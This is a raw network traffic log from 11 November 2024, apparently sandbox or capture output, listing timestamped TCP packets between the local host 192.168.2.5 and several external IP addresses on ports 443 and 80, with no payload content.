Nov 11, 2024 10:33:08.081031084 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.081039906 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.081046104 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.081079006 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.082416058 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.082520962 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.082525015 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.084638119 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.084767103 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.084772110 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.086797953 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.086853981 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.086867094 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.089066982 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.089121103 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.089127064 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.091236115 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.091528893 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.091535091 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.093638897 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.093683004 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.093688011 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.095490932 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.095567942 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.095572948 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.097640038 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.097706079 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.097712040 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.140233040 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.140244007 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.153084040 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.153152943 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.153220892 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:09.385220051 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:09.385251999 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:09.385308981 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:09.385468960 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:09.385483027 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:09.955552101 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:09.955610037 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:09.983066082 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:09.983366966 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:09.983380079 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:09.984219074 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:09.984278917 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:09.985694885 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:09.985754013 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:09.985941887 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:09.985948086 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.030854940 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.267215967 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.267265081 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.267299891 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.267302036 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.267309904 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.267345905 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.267349958 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.267385006 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.267416000 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.267419100 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.267425060 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.267461061 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.267465115 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.272135019 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.272186041 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.272197008 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.272470951 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.272500992 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.272531986 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.272532940 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.272542953 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.272572041 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.273420095 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.273461103 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.273464918 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.274195910 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.274225950 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.274245977 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.274257898 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.274300098 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.275024891 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.275068998 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.275115013 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.275120974 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.275907040 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.275933981 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.275949955 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.275955915 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.275991917 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.276694059 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.277559042 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.277601004 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.277606010 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.316157103 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.316195965 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.316210032 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.316215992 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.316255093 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.316258907 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.316392899 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.316425085 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.316437006 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.316441059 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.316473961 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.316478014 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.318195105 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.318226099 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.318243027 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.318247080 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.318288088 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.318290949 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.318434954 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.318475008 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.318479061 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.324178934 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.324225903 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.324230909 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.325661898 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.325710058 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.325715065 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.329930067 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.329977036 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.329982996 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.334007978 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.334059000 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.334065914 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.338012934 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.338069916 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.338074923 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.341902018 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.341948032 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.341953993 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.345932961 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.345993042 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.345999002 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.350059032 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.350117922 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.350122929 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.354069948 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.354121923 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.354126930 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.358478069 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.358529091 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.358534098 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.362222910 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.362301111 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.362309933 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.366240978 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.366290092 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.366296053 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.377543926 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:10.377559900 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:10.377631903 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:10.377811909 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:10.377830029 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:10.397229910 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397299051 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.397303104 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397362947 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397393942 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397403955 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.397408009 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397445917 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397448063 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.397455931 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397491932 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.397497892 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397618055 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397645950 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397658110 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.397661924 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397706032 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.397707939 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397716999 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.397766113 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.397770882 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.398349047 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.398399115 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.398403883 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.400624990 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.400676012 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.400681019 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.404138088 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.404186964 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.404191971 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.406310081 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.406356096 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.406361103 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.406482935 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.406514883 CET	443	49719	172.217.16.142	192.168.2.5
Nov 11, 2024 10:33:10.406563997 CET	49719	443	192.168.2.5	172.217.16.142
Nov 11, 2024 10:33:10.501485109 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:10.501532078 CET	443	49723	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:10.501612902 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:10.501832008 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:10.501842976 CET	443	49723	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:10.966905117 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:10.967175007 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:10.967194080 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:10.967611074 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:10.967670918 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:10.968352079 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:10.968400955 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:10.969504118 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:10.969584942 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:10.969799042 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:10.969806910 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:10.969822884 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:11.011332035 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:11.015377045 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:11.095417976 CET	443	49723	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:11.095856905 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:11.095884085 CET	443	49723	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:11.096764088 CET	443	49723	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:11.096822023 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:11.097148895 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:11.097207069 CET	443	49723	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:11.140466928 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:11.140477896 CET	443	49723	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:11.170928955 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:11.187431097 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:11.218539953 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:11.218550920 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:11.219944954 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:11.220019102 CET	443	49722	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:11.220082998 CET	49722	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:11.519341946 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:11.519371033 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:11.519449949 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:11.520840883 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:11.520854950 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.047060966 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:12.047295094 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:12.052038908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:12.052382946 CET	80	49729	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:12.052442074 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:12.053237915 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:12.053265095 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:12.058064938 CET	80	49729	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:12.058079958 CET	80	49729	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:12.105751038 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.105813980 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.109565973 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.109571934 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.109865904 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.151577950 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.195333958 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.237207890 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.237242937 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.237310886 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.238039970 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.238055944 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.318243027 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.318420887 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.318464994 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.318484068 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.318497896 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.318504095 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.318514109 CET	49725	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.318517923 CET	443	49725	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.363328934 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.363369942 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.363507032 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.363809109 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.363821030 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.827352047 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.827562094 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.827584028 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.827899933 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.827982903 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.828501940 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.828551054 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.828710079 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.828752041 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.828854084 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.828860998 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.828874111 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.871340036 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:12.874298096 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:12.944081068 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.944147110 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.951236010 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.951247931 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.951514959 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:12.952914000 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:12.999330997 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:13.049145937 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:13.093374014 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:13.093391895 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:13.094434977 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:13.094475985 CET	443	49730	142.250.185.174	192.168.2.5
Nov 11, 2024 10:33:13.094538927 CET	49730	443	192.168.2.5	142.250.185.174
Nov 11, 2024 10:33:13.119297981 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:13.119360924 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:13.119422913 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:13.120049000 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:13.120065928 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:13.120074987 CET	49731	443	192.168.2.5	184.28.90.27
Nov 11, 2024 10:33:13.120079994 CET	443	49731	184.28.90.27	192.168.2.5
Nov 11, 2024 10:33:13.196187973 CET	80	49729	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:13.196249962 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:13.309855938 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:13.314626932 CET	80	49729	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:13.440733910 CET	49723	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:14.006031990 CET	80	49729	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:14.006170988 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:17.728059053 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:17.728075027 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:17.728118896 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:17.855722904 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:17.855746984 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:18.577327967 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:18.688606977 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:18.852536917 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:18.852560997 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:18.853771925 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:18.853786945 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:18.853838921 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:18.953057051 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:18.953217983 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:19.124202967 CET	80	49729	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:19.126575947 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:19.145855904 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:19.145879030 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:19.288921118 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:19.304657936 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:19.374201059 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:19.374335051 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:19.718671083 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:19.718693972 CET	443	49738	94.245.104.56	192.168.2.5
Nov 11, 2024 10:33:19.718708038 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:19.718749046 CET	49738	443	192.168.2.5	94.245.104.56
Nov 11, 2024 10:33:19.777189970 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:19.777239084 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:19.777369976 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:19.777904987 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:19.777916908 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:19.837903023 CET	49729	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:19.838911057 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:19.842708111 CET	80	49729	185.215.113.206	192.168.2.5
